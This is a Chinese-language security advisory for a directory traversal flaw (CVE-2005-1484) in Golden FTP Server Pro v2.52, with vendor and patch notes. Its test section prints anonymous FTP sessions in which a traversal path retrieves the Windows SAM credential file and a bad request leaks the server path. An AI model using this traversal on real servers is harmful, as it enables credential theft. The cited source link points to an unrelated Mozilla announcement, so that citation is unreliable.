发布日期：2005-05-08
更新日期：2005-05-08

受影响系统：

KMiNT21 Golden FTP Server Pro v2.52

描述：

---

BUGTRAQ  ID: 13479
CVE(CAN) ID: CVE-2005-1484

Golden FTP Server是一款非常易用的Windows平台的个人FTP服务程序。

Golden FTP Server对于路径处理的实现上存在漏洞，远程攻击者可能执行目录遍历攻击。

任何用户都可能通过目录遍历序列绕过ftproot限制，访问任意文件。攻击者还可能通过请求不存在的文件泄漏共享路径。

<*来源：Lachlan. H （pseudonym_ok@yahoo.com）
  
  链接：http://www.mozilla.org/security/announce/mfsa2005-42.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

C:\>ftp ********
Connected to **********
220 Golden FTP Server PRO ready v2.52
User (********:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> GET "\../winnt/repair/sam
200 PORT Command successful.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp: 24576 bytes received in 1.10Seconds
22.32Kbytes/sec.
ftp> !dir sam
Volume in drive C has no label.
Volume Serial Number is F4A5-2272

Directory of C:\

26/04/2005  11:30 AM            24,576 Sam
               1 File(s)         24,576 bytes
               0 Dir(s)  30,103,302,656 bytes free
ftp>

*

C:\>ftp ****
Connected to ****
220 Golden FTP Server PRO ready v2.52
User (******:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> get C:\blah
200 PORT Command successful.
550 Cannot open file C:\Temp\C:\blah

建议：

---

厂商补丁：

KMiNT21
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www[dot]goldenftpserver[dot]com/

浏览次数：3563
严重程度：0（网友投票）